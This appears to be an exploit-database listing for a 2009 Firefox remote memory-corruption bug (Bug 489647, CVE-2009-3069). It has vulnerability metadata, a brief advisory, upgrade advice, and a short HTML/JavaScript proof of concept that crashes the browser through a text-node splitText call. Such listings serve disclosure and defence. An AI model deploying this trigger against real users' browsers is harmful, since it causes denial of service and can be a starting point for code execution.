header-logo
Suggest Exploit
vendor:
Firefox
by:
moz_bug_r_a4
9.3
CVSS
HIGH
Remote Memory-Corruption Vulnerability
119
CWE
Product Name: Firefox
Affected Version From: Firefox 1.9.0.9
Affected Version To: Firefox 3.0.15
Patch Exists: YES
Related CWE: CVE-2009-3069
CPE: a:mozilla:firefox:3.0.15
Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-3069/https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-3069/https://www.rapid7.com/db/vulnerabilities/mfsa2009-47-cve-2009-3069/
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=63402https://www.infosecmatter.com/nessus-plugin-library/?id=51077https://www.infosecmatter.com/nessus-plugin-library/?id=59675https://www.infosecmatter.com/nessus-plugin-library/?id=51971
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

Bug 489647 – New 1.9.0.9 topcrash [@nsTextFrame::ClearTextRun()]

Mozilla Firefox is prone to a remote memory-corruption vulnerability. Successful exploits will allow remote attackers to execute arbitrary code within the context of the affected browser or crash the browser, denying service to legitimate users.

Mitigation:

Upgrade to the latest version of Firefox
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/34743/info

Mozilla Firefox is prone to a remote memory-corruption vulnerability.

Successful exploits will allow remote attackers to execute arbitrary code within the context of the affected browser or crash the browser, denying service to legitimate users. 

<html><head><title> Bug 489647 - New 1.9.0.9 topcrash [@nsTextFrame::ClearTextRun()]</title></head> <body> <div id="a" style="white-space: pre;"> m</div> <script> function doe() { document.getElementById('a').childNodes[0].splitText(1); } setTimeout(doe, 100); </script> </body> </html>

Navigation

Suggest Exploit

Services By CQR